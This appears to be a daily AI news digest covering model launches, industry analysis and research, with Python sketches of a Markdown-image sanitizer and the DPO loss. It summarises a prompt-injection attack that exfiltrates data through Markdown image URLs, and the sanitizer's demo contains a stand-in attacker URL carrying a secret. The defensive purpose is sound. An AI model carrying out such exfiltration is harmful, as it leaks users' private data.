AI Updates on 2025-11-20

AI Model Announcements

  • Meta releases SAM 3, a unified model architecture for detection and tracking in computer vision @AIatMeta
  • Jan announces Jan-v2-VL, a new multimodal agent built on Qwen3-VL that executes 49 steps without failing, significantly outperforming other models on long-horizon tasks @Alibaba_Qwen
  • AI2 releases OLMo 3 family of fully open language models, including the best 32B base model, best 7B Western thinking and instruct models, and first 32B fully open reasoning model, with complete training data, code, checkpoints, and logs @natolambert
  • Google launches Gemini 3 Pro Image (Nano Banana Pro), achieving state-of-the-art performance in image generation and editing with improved text rendering, world knowledge integration via Google Search, and support for 1K, 2K, and 4K resolution outputs @GoogleDeepMind
  • OpenAI releases GPT-5.1 Pro to all Pro users, delivering 10-15% improvement over GPT-5 Pro for complex work including writing help, data science, and business tasks @OpenAI
  • OpenAI launches GPT-5.1-Codex-Max, a significant improvement in coding capabilities @sama
  • xAI introduces Grok 4.1 Fast, its best tool-calling model, with a 2M context window, trained with long-horizon RL for multi-turn scenarios and real-world enterprise use cases like customer support @xai
  • Gemini 3 achieves state-of-the-art performance on SWE Bench Verified using a standard agent harness @OfficialLoganK
  • NVIDIA releases Nemotron-Parse v1.1, next-generation OCR for parsing PDFs and PPTs into structured, machine-ready output with text, bounding boxes, and semantic classes @andimarafioti

AI Industry Analysis

  • MIT research shows closed models dominate with 80% of monthly LLM tokens despite being 6x more expensive than open models with only modest performance advantages, suggesting $24.8 billion in potential consumer savings if users switched to superior open alternatives @ClementDelangue
  • Google prohibits its developers from using the publicly launched Antigravity IDE for work, requiring them to use an internal version called Jetski that supports Google's monorepo and custom tooling, which highlights how isolated Google's tech stack is @GergelyOrosz
  • AI developers remain bullish about growth despite low AI penetration in businesses, with many skilled teams starting to deliver significant ROI, and the widely cited study claiming 95% of AI pilots fail reportedly has methodological issues @AndrewYNg
  • Frontier open models typically reach performance parity with frontier closed models within months, yet users continue selecting closed models even when open alternatives are cheaper and offer superior performance @ClementDelangue
  • AI coding agents may fundamentally change development workflows as they execute framework changes without questioning decisions, unlike human developers who would dismiss impractical suggestions @GergelyOrosz
  • Stuut raises $29.5M Series A led by a16z to automate accounts receivable work for blue-collar businesses in manufacturing, medical devices, logistics, and distribution using AI agents @TAlaruri
  • Natural gas has become central to both AI datacenter power and LNG exports, with most new datacenters expected to be powered by natural gas in the near term @a16z

AI Ethics & Society

  • Google introduces SynthID detection feature in Gemini app, allowing users to upload images and verify if they were generated by Google AI through imperceptible digital watermarks @GeminiApp
  • Simon Willison warns that Antigravity is vulnerable to prompt injection attacks where malicious actors can exfiltrate data by constructing URLs to external servers and invisibly leaking stolen information through Markdown image rendering @simonw
  • The same Markdown image data exfiltration vulnerability was previously reported and fixed in Copilot chat for VS Code, but remains unpatched in Windsurf as of May 2025 @simonw
  • Research reveals a growing crisis of economically and socially dislocated young adults, with nearly 10% in the UK and US neither working, seeking work, in education, nor raising children, a share that has doubled in the UK over a decade @jburnmurdoch
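
The Markdown image exfiltration issue reported above works because a rendered image URL can carry stolen data in its query string to an attacker's server. One common mitigation is to drop images whose host is not explicitly trusted before rendering model output. The following is a minimal sketch of that idea, not the fix any of the named products shipped; the function name, the allowlist, and the example hosts are hypothetical, and it only covers inline `![alt](url)` syntax (not reference-style images or raw HTML).

```python
import re
from urllib.parse import urlparse

# Matches inline Markdown images: ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_untrusted_images(markdown, allowed_hosts):
    """Replace inline images whose host is not in allowed_hosts.

    allowed_hosts is a set of lowercase hostnames (an assumption of this
    sketch). Relative URLs have no hostname and are removed as well,
    which errs on the side of caution.
    """
    def replace(match):
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname
        if host is not None and host.lower() in allowed_hosts:
            return match.group(0)  # trusted host: keep the image as written
        return f"[image removed: {alt}]"

    return IMAGE_PATTERN.sub(replace, markdown)


if __name__ == "__main__":
    text = "Result ![chart](https://attacker.example/log?d=SECRET) done"
    print(strip_untrusted_images(text, {"cdn.example.com"}))
```

Filtering at render time means a successful prompt injection can still alter the text of a response, but it can no longer trigger a silent network request to an arbitrary server.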

AI Applications

  • Perplexity launches Comet browser for Android with voice mode allowing users to chat with and control tabs, summarize content, and take actions across all tabs without losing context @perplexity_ai
  • OpenAI rolls out group chats globally to ChatGPT Free, Go, Plus and Pro users, transforming ChatGPT from single-player to multi-player experience @OpenAI
  • NotebookLM introduces slide deck generation feature for Pro users, converting sources into detailed decks for reading or presentation-ready slides that are fully customizable @NotebookLM
  • Nano Banana Pro demonstrates ability to create complex infographics, comic strips, menus, marketing materials, and logo designs in single prompts, potentially replacing tools like Canva for many use cases @deedydas
  • Andrew Ng demonstrates agentic document extraction on NVIDIA's latest 10-Q earnings report, achieving highly accurate results powered by a document pre-trained transformer model @AndrewYNg
  • xAI launches Agent Tools API enabling developers to give Grok autonomous web browsing, X post searching, code execution, and document retrieval capabilities with just a few lines of code @xai
  • Figma integrates Nano Banana Pro across its platform, enabling users to adjust images while maintaining visual DNA, prompt existing images in new contexts, and composite multiple images into coherent scenes @figma

AI Research

  • OpenAI publishes research showing GPT-5 accelerating scientific discovery through case studies where it helped researchers synthesize scattered results, surface mechanisms, navigate literature conceptually, and generate new proofs of unsolved propositions @OpenAI
  • GPT-5 solved a 2013 conjecture and a COLT 2012 open problem after two days of thinking in scaffolded experiments with university and national-lab partners @SebastienBubeck
  • Research demonstrates that LLMs are trained to model the entire distribution, not just the average, and reinforcement learning enables them to go beyond the human distribution, similar to AlphaGo's Move 37 discovery @polynoamial
  • OLMo 3 uses direct preference optimization (DPO) with Qwen3 32B as the chosen model and Qwen3 0.6B as the rejected model, based on the delta learning hypothesis that models learn from the difference between chosen and rejected samples rather than from overall quality alone @natolambert
  • AI2 introduces an "active refilling" technique in RL training that keeps generations from learner nodes constantly flowing until there is a full batch of completions with nonzero gradients, a major advantage of the asynchronous approach @natolambert
  • Gemini 3 demonstrates advanced reasoning with access to live search, enabling creation of infographics and visualizations using real-time information from Google's knowledge base @GoogleDeepMind
  • Using AI to check the work of other AIs remains hugely under-researched, with one paper finding the technique effective but no follow-up studies on whether using different models helps reduce errors @emollick
  • Grok 4.1 Fast was trained on diverse simulated environments across dozens of domains, achieving state-of-the-art performance on real-world agentic workflows and excelling at real-time information retrieval and deep research @xai
  • OLMo 3 32B Think scores within 1-2 points of Qwen3 32B on reasoning benchmarks including AIME and GPQA, representing the first fully open reasoning model at 32B scale or larger @natolambert
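
To make the DPO item above concrete, here is a minimal sketch of the standard DPO loss for a single preference pair, where the chosen response would come from the stronger model (Qwen3 32B) and the rejected response from the weaker one (Qwen3 0.6B). This is the textbook objective, not AI2's training code; the function names, the `beta` value, and the example log-probabilities are assumptions for illustration.

```python
import math


def softplus(x):
    """Numerically stable log(1 + exp(x))."""
    return max(x, 0.0) + math.log1p(math.exp(-abs(x)))


def dpo_loss(policy_chosen_logp, policy_rejected_logp,
             ref_chosen_logp, ref_rejected_logp, beta=0.1):
    """Standard DPO loss for one (chosen, rejected) pair.

    Each argument is the summed log-probability of a full response under
    the policy being trained or the frozen reference model. beta=0.1 is
    an illustrative value, not one taken from the OLMo 3 report.
    """
    chosen_margin = policy_chosen_logp - ref_chosen_logp
    rejected_margin = policy_rejected_logp - ref_rejected_logp
    logits = beta * (chosen_margin - rejected_margin)
    # -log(sigmoid(logits)) equals softplus(-logits)
    return softplus(-logits)


if __name__ == "__main__":
    # Policy identical to the reference: the loss is log(2).
    print(dpo_loss(-10.0, -10.0, -10.0, -10.0))
    # Policy favors the chosen response more than the reference does.
    print(dpo_loss(-8.0, -12.0, -10.0, -10.0))
```

The loss depends only on the gap between the chosen and rejected margins, which is consistent with the delta learning framing: the training signal comes from the difference between the two samples, not from how good either one is in absolute terms.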